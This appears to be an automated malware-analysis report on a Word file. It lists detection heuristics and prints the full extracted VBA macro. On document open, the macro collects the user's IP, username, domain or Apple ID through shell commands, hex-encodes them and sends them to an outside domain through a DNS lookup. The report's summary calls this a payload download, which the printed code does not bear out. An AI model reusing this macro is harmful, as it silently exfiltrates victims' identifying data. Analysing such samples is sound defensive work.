MALICIOUS
378
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros with a Document_Open auto-execution macro. This macro utilizes WScript.Shell to construct and attempt to execute a URL, likely to download and run a secondary payload. The presence of the 'SE_ENABLE_LURE' heuristic indicates the document likely prompts the user to enable macros, a common social engineering tactic.
Heuristics 10
-
ClamAV: Doc.Malware.Valyria-10010011-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim script As String RetVal = MacScript("do shell script ""route -n get default""") Interface = Split(Split(RetVal, vbCr)(4), ": ")(1) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim sArr() As String Set WshShell = VBA.CreateObject("WScript.Shell") Set oExec = WshShell.exec("ipconfig.exe") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim sArr() As String Set WshShell = VBA.CreateObject("WScript.Shell") Set oExec = WshShell.exec("ipconfig.exe") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() #If Mac Then -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim sUsername As String sUsername = Environ$("USER") Mac_Get_Username = sUsername -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6606 bytes |
SHA-256: 2e188e110157f32231f8afed4df361b88370c096ebc23a6193761b82784912b1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
#If Mac Then
ip = Module1.Mac_Get_IP
username = Module1.Mac_Get_Username
appid = Module1.Mac_Get_AppleID
request = Module1.Mangle_Request(appid, username, ip, "M")
#Else
ip = Module1.Windows_Get_IP
username = Module1.Windows_Get_Username
domain = Module1.Windows_Get_Domain
request = Module1.Mangle_Request(domain, username, ip, "W")
#End If
Module1.Trigger_Token (request)
End Sub
Attribute VB_Name = "Module1"
Option Explicit
Public Const BASE = ".lye04n5skx8tl4ter9la0r0t5.49d185155faa.o3n.io..................................................................................................."
Public Const EOS = "..."
Public Function Trigger_Token(request As String)
On Error GoTo Err_Trigger
Application.Documents.CanCheckOut ("http://" & request)
Err_Trigger:
Exit Function
End Function
Public Function Mac_Get_IP() As String
On Error GoTo Err_IP
Dim RetVal As String
Dim Interface As String
Dim Length As Integer
Dim script As String
RetVal = MacScript("do shell script ""route -n get default""")
Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
RetVal = MacScript("do shell script ""ifconfig " + Interface + " inet""")
Mac_Get_IP = Split(Split(RetVal, "inet ")(1), " ")(0)
Exit_IP:
Exit Function
Err_IP:
Mac_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Mac_Get_AppleID() As String
On Error GoTo Err_AppleID
Dim RetVal As String
Dim script As String
#If MAC_OFFICE_VERSION >= 15 Then
Dim User As String
Dim Email As String
Dim EmailArr() As String
Dim Length As Integer
User = MacScript("do shell script ""id -un"" ")
script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
RetVal = MacScript(script)
EmailArr = Split(RetVal, " ")
Length = UBound(EmailArr) - LBound(EmailArr) + 1
Dim i As Integer
For i = 0 To Length - 1
If EmailArr(i) Like "*@*" Then
RetVal = EmailArr(i)
Exit For
End If
Next i
#Else
script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
" to get email addresses of every account"
RetVal = MacScript(script)
#End If
Mac_Get_AppleID = Trim(RetVal)
Exit_AppleID:
Exit Function
Err_AppleID:
Mac_Get_AppleID = "none"
Resume Exit_AppleID
End Function
Public Function Mac_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("USER")
Mac_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Mac_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_IP() As String
On Error GoTo Err_IP
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("ipconfig.exe")
oExec.StdIn.Write "/a"
sOutput = oExec.StdOut.ReadAll()
sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
Exit_IP:
Exit Function
Err_IP:
Windows_Get_IP = "none"
Resume Exit_IP
End Function
Public Function Windows_Get_Username() As String
On Error GoTo Err_Username
Dim sUsername As String
sUsername = Environ$("username")
Windows_Get_Username = sUsername
Exit_Username:
Exit Function
Err_Username:
Windows_Get_Username = "none"
Resume Exit_Username
End Function
Public Function Windows_Get_Domain() As String
On Error GoTo Err_Domain
Dim WshShell As Object
Dim oExec As Object
Dim sOutput As String
Dim sArr() As String
Dim sErr As String
Set WshShell = VBA.CreateObject("WScript.Shell")
Set oExec = WshShell.exec("whoami /upn")
Do While oExec.Status = 0
DoEvents
Loop
sOutput = oExec.StdOut.ReadAll()
sErr = oExec.StdErr.ReadAll()
If sErr Like "*ERROR*" Then
Set oExec = WshShell.exec("whoami /user /NH")
sOutput = oExec.StdOut.ReadAll()
Windows_Get_Domain = Trim(Split(sOutput, "\")(0))
Else
Windows_Get_Domain = Trim(Split(sOutput, "@")(1))
End If
Exit_Domain:
Exit Function
Err_Domain:
Windows_Get_Domain = "none"
Resume Exit_Domain
End Function
Public Function Mangle_Request(ByVal userData As String, ByVal username As String, ByVal ip As String, ByVal os As String) As String
Dim sRequest As String
Dim sMaxLength As Long
Dim reducedBase As String
reducedBase = Left(BASE, InStr(BASE, EOS) - 1)
sRequest = EncodeHex(username, "") & ".u" & os & "." & EncodeHex(ip, "") & ".MW" & reducedBase
sMaxLength = 250 - Len(sRequest)
If Len(userData) > 0 Then
sRequest = AddExtra(userData, sMaxLength) & ".d." & sRequest
Else
sRequest = EncodeHex("none", "") & ".d." & sRequest
End If
Mangle_Request = sRequest
End Function
Private Function AddExtra(userData As String, sMaxLength As Long) As String
Dim i As Long
Dim enLen As Long
Dim sTestUrl As String
Dim encoded As String
Do
sTestUrl = ""
encoded = EncodeHex(userData, "")
i = 1
enLen = Len(encoded)
Do While i < enLen
If i + 62 > enLen Then
sTestUrl = sTestUrl & Mid(encoded, i, enLen)
Else
sTestUrl = sTestUrl & Mid(encoded, i, 63) & "."
End If
i = i + 62
Loop
If Len(sTestUrl) <= sMaxLength Then
Exit Do
End If
userData = Left(userData, Len(userData) - 2)
Loop
AddExtra = sTestUrl
End Function
Private Function EncodeHex(sData As String, Optional HexPrefix As String = "0x") As String
Dim iChar As Integer
Dim sOutString As String
Dim sTmpChar As String
sOutString = ""
For iChar = 1 To Len(sData)
sTmpChar = Hex$(Asc(Mid(sData, iChar, 1)))
If Len(sTmpChar) = 1 Then sTmpChar = "0" & sTmpChar
sOutString = sOutString & sTmpChar
Next iChar
EncodeHex = sOutString
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 22016 bytes |
SHA-256: da6d31c8a750aabe90c47e2174d6b4970bec4a772f60e518f0adba5dfe853106 |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10010011-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.